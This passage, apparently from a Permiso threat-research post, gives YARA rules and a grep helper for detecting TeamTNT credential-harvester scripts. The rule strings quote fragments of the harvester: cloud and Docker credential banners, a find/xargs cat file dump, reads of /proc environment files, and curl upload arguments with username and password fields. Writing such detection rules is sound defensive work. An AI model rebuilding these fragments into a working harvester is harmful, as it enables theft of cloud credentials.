        (any of ($shellHeader*)) and (10 of ($credFileCommon*)) and $fileSearchCmd and (any of ($fileAccessCmd*)) and not (all of ($linPEAS*))
}
```

```yara
rule P0_Hunting_Common_TeamTNT_CredHarvesterOutputBanner_1 {
    meta:
        description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing specific section banner output commands"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_04 = "f7df739f865448ac82da01b3b1a97041"
        md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_06 = "99f0102d673423c920af1abc22f66d4e"
        md5_07 = "99f0102d673423c920af1abc22f66d4e"
        md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $sectionBanner_01 = "-------- AWS INFO ------------------------------------------"
        $sectionBanner_02 = "-------- EC2 USERDATA -------------------------------------------"
        $sectionBanner_03 = "-------- GOOGLE DATA --------------------------------------"
        $sectionBanner_04 = "-------- AZURE DATA --------------------------------------"
        $sectionBanner_05 = "-------- IAM USERDATA -------------------------------------------"
        $sectionBanner_06 = "-------- AWS ENV DATA --------------------------------------"
        $sectionBanner_07 = "-------- PROC VARS -----------------------------------"
        $sectionBanner_08 = "-------- DOCKER CREDS -----------------------------------"
        $sectionBanner_09 = "-------- CREDS FILES -----------------------------------"
    condition:
        (5 of them)
}
```

```yara
rule P0_Hunting_Common_TeamTNT_CredHarvesterTypo_1 {
    meta:
        description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common typo for 'CREFILE' variable name (assuming intended name is 'CREDFILE' since it is iterating file names in input array)"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "3e2cddf76334529a14076c3659a68d92"
        md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_04 = "28165d28693ca807fb3d4568624c5ba9"
        md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_06 = "f7df739f865448ac82da01b3b1a97041"
        md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_08 = "99f0102d673423c920af1abc22f66d4e"
        md5_09 = "99f0102d673423c920af1abc22f66d4e"
        md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $varNameTypo = "for CREFILE in ${"
        $findArgs = "find / -maxdepth "
        $xargs = " | xargs -I % sh -c 'echo :::%; cat %' >> $"
    condition:
        all of them
}
```
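On hosts where YARA is not installed, the P0_Hunting_Common_TeamTNT_CredHarvesterTypo_1 rule's "all of them" condition can be approximated with fixed-string grep. This is a rough, hypothetical equivalent (not published by Permiso): it reads the file once per string, only handles text content, and ignores YARA features such as offsets and counts.

```bash
#!/usr/bin/env bash
# Hypothetical grep approximation of P0_Hunting_Common_TeamTNT_CredHarvesterTypo_1:
# returns 0 only if FILE contains all three fixed strings from the rule.
matches_crefile_typo_rule() {
  local file="$1" pattern
  for pattern in \
    'for CREFILE in ${' \
    'find / -maxdepth ' \
    " | xargs -I % sh -c 'echo :::%; cat %' >> \$"; do
    # Mirror the rule's "all of them": any missing string means no match
    grep -qF -- "$pattern" "$file" || return 1
  done
  return 0
}
```

Usage: `matches_crefile_typo_rule /path/to/suspect.sh && echo "CREFILE typo pattern present"`. Where YARA is available, running the rule itself is preferable.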

```yara
rule P0_Hunting_Common_TeamTNT_CredHarvesterTypo_2 {
    meta:
        description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common typo for 'get_prov_vars' function name (assuming intended name is 'get_proc_vars' since it is outputting process variables)"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_02 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_03 = "f7df739f865448ac82da01b3b1a97041"
        md5_04 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_05 = "99f0102d673423c920af1abc22f66d4e"
        md5_06 = "99f0102d673423c920af1abc22f66d4e"
        md5_07 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $funcNameTypo = "get_prov_vars"
        $fileAccess_01 = "cat "
        $fileAccess_02 = "strings "
        $envVarFilePath = " /proc/*/env*"
    condition:
        $funcNameTypo and (any of ($fileAccess*)) and $envVarFilePath
}
```

```yara
rule P0_Hunting_Common_TeamTNT_CurlArgs_1 {
    meta:
        description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common curl arguments including 'Datei' (German word for 'file') and specific 'Send=1' arguments found in German blog post https://administrator.de/tutorial/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html which details using curl (with these specific arguments) to upload files to upload.php"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_04 = "f7df739f865448ac82da01b3b1a97041"
        md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_06 = "99f0102d673423c920af1abc22f66d4e"
        md5_07 = "99f0102d673423c920af1abc22f66d4e"
        md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $curlFileArgGerman = "\"Datei=@\""
        $curlArgSend = " -F \"Send=1\" "
        $curlArgUsername = " -F \"username="
        $curlArgPassword = " -F \"password="
    condition:
        all of them
}
```

Note: This article was expertly written and contributed by Permiso researcher Abian Morina.
